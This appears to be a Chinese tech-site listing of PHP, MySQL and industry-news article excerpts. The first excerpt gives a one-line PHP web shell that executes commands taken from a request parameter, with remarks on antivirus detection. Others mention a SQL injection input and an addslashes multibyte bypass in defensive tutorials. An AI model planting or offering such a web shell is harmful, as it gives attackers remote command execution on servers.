-
php一句话cmdshell新型 (非一句话木马)
本文为大家讲解了一个新的一句话木马写法:"`"(键盘上~符号的下档键),和python中一样,这个符号中的命令会被php解析器执行,感兴趣的同学参考下. php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码; //write by skyfire */ echo `$_REQUEST[id]`; ?> ...
PHP 2014-12-13 05:27:08 -
PHP Google的translate API代码
本文是一个php实现的调用google翻译的工具,可以用来翻译英文,感兴趣的同学参考下. header("Content-Type: text/html; charset=utf-8"); class Google_API_translator{ public $opts = array("text" => "", "language_pair" => "en|it"); public $out = ""; function setOpts($opts) { if($opts["text"] != "") $this->opts["text"] = $opts["text"]; if($opts["language_pair"] != "") $this->opts["language_pair...
PHP 2014-12-12 15:57:06 -
php addslashes 函数使用说明
本文为大家讲解了php下的addslashes函数的使用方法,及用处,感兴趣的同学参考下. addslashes (PHP 3, PHP 4, PHP 5) addslashes -- 使用反斜线引用字符串 描述 string addslashes ( string str ) 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)...
PHP 2014-12-12 15:00:14 -
微软:IE11可选择关闭“问题大户”SSL3.0
站长搜索(www.adminso.com):微软:IE11可选择关闭“问题大户”SSL3.0 站长搜索讯 12月11日消息,微软曾经表示过要在12月让用户可以关闭IE浏览器中存在问题的SSL3.0。如今微软兑现了此前承诺,在IE11中提供给了用户一个关闭选项,并且宣称要在2015年2月10日默认关闭IE浏览器中的SSL3.0...
业界动态 2014-12-12 09:48:06 -
php addslashes和mysql_real_escape_string使用介绍
本文为大家讲解的是用 mysql_real_escape_string对用户提交数据进行整理处理和通过addslashes以及mysql_escape_string这3个类似的功能函数的区别。经过转义的数据可以直接插入到数据库中...
PHP 2014-12-09 07:27:03 -
支持数组的ADDSLASHES的php函数
本文是一个封装好的php addslashes函数,可以用来对数组进行递归的加反斜杠,感兴趣的同学参考下。 //SQL ADDSLASHES function saddslashes($string) { if(is_array($string)) { foreach($string as $key => $val) { $string[$key] = saddslashes($val); } } else { $string = addslashes($string); } return $string; }...
PHP 2014-12-09 07:00:05 -
php与XML、XSLT、Mysql的结合运用示例
本文为大家讲解的是php与XML、XSLT、Mysql的结合运用示例代码,需要的朋友可以参考下。 使用php中的xml与xslt要用到一些dll库, extension=php_domxml.dll //操作XML的函数库 extension=php_iconv.dll //转码用的,比如将GB2312的转成UTF-8的 extension=php_xslt.dll //XSLT的函数库 使用上面这三个库的时候,你要将php安装目录下的dlls目录加入到路径中,否则会找不到 这些类库的 在下面的课程中,我们会用到php中的PEAR类库,主要用了DB类库,Sql2XML类库,大家可以在 pear.php.net上下载最新的版本 下载完上面二个类库以后,大家最好在php.ini中设置一下 include_path = ".;d:phppear" d:phppear 是我的pear的安装路径 设置完以后,重新启动一下机器,否则因为路径找不到而导致Apache启动不正常,无法正常使用 至此要使用PHP中的XML和XSLT的设置就完成了,...
PHP 2014-12-07 16:00:06 -
Mysql添加用户错误:ERROR 1364 (HY000): Field 'ssl_cipher' doesn't have a default value解决方法
本文向大家讲解的是Mysql添加用户错误:ERROR 1364 (HY000): Field 'ssl_cipher' doesn't have a default value解决方法,感兴趣的同学参考下。 错误描述: 添加用户 insert into mysql.user(Host,User,Password) values("localhost","test",password("1234")); 报以下的错误 ERROR 1364 (HY000): Field 'ssl_cipher' doesn't have a default value错误 mysql5.1以上版本,我是在5.6版本上操作的...
数据库操作教程 2014-12-06 01:42:10 -
在win7下如何做到开机自动连接ADSL拨号
在win7下如何做到开机自动连接ADSL拨号 每天打开电脑后的第一件事就是上网,而上网前一定要手动连接ADSL才行,有没有觉得这样每天用每次都手动连接有些麻烦?如果有这种感觉,那就往下看吧,以下就为你介绍在在win7下如何做到开机就自动连接ADSL拨号的方法: 在开始搜索框中输入ncpa.cpl,按回车打开网络连接; 转 打开网络连接 在刚才设立的连接图标上,右击鼠标,选择属性; 打开连接属性 在选项标签中,确认提示名称、密码、凭证等这个选项前没有打勾;然后,点击确定; 取消勾选“提示名称、密码和证书等” 在连接图标上,右击鼠标,选择建立快捷方式; 创建快捷方式 Windows会问你是否将快捷方式放在桌面上,点击按钮“是(Y)”; 确定创建快捷方式 回到桌面,在快捷方式图标上,右击鼠标,选择复制; 复制快捷方式 接着,再按一下开始按钮,选择所有程序,右击启动,选择打开所有用户; 打开所有用户启...
系统程序 2014-12-05 14:06:18 -
$_GET['goods_id']+0 的使用详解
本文为大家讲解的是$_GET['goods_id']+0 的使用详解,感兴趣的同学参考下。 目的: 为了防止sql注入,tid,goods_id都是正整数类型,防止人为了在后面追加 ?tid=1 or 1 这样的语句. 原理: 不管你的参数多么险恶,+0后都老老实实变成数值类型 比如 '?tid=1 or 1' , $_GET['tid']+0 后值变成1; 有学生问,你为什么不用(int)强转或intval来转换. 1: 用哪种方式,目的都是一样的 2: 用+0,只需要打2个字符,用(int)要打5个,intval()要打8个. 3: 对于+0,我不需要关心$tid是整型还是浮点型,还是大于2^32的长整型(如mysql中取得bigint), +0都能适应. 而用强转,则会发生溢出,当然你可以说,我用float来转,那不是还得分情况区别吗....
PHP 2014-12-03 17:55:52 -
京东增发2180万股ADS 股价大涨近10%
站长搜索讯 12月3日,京东(纳斯达克全球精选市场股票代码:JD)周二向美国证券交易委员会(SEC)提交F1文件称,该公司的献售股东将出售21,834,444股美国存托凭证,每股美国存托凭证代表两股A类普通股。 这项交易的最高总发行金额将达4.96亿美元左右,每股A类普通股的最高发行价格为11.36美元...
电子商务 2014-12-03 06:55:57 -
php addslashes及其他清除空格的方法是不安全的
本文为大家讲解的是php addslashes函数使用方法及其他清除空格的方法是不安全的原因分析,感兴趣的同学参考下. 清除空格的方法是不安全的,部分原因是因为字符中的空格非常多,例如 "addslashes的问题在 于黑客 可以用0xbf27来代替单引号,而addslashes只是将0xbf27修改为0xbf5c27,成为一个有效的多字节字符,其中的0xbf5c仍会 被看作是单引号,所以addslashes无法成功拦截。" 最好是按照具体的参数需求校验确定是 int 等不是,外加数据库的参数操作方法.其实这个是数据库的 sql 问题,应该从源头数据库本身来解决,只不过有些数据库滑提供相应的方法罢了. SQL注入攻击是黑客攻击网站最常用的手段...
PHP 2014-12-02 09:40:24
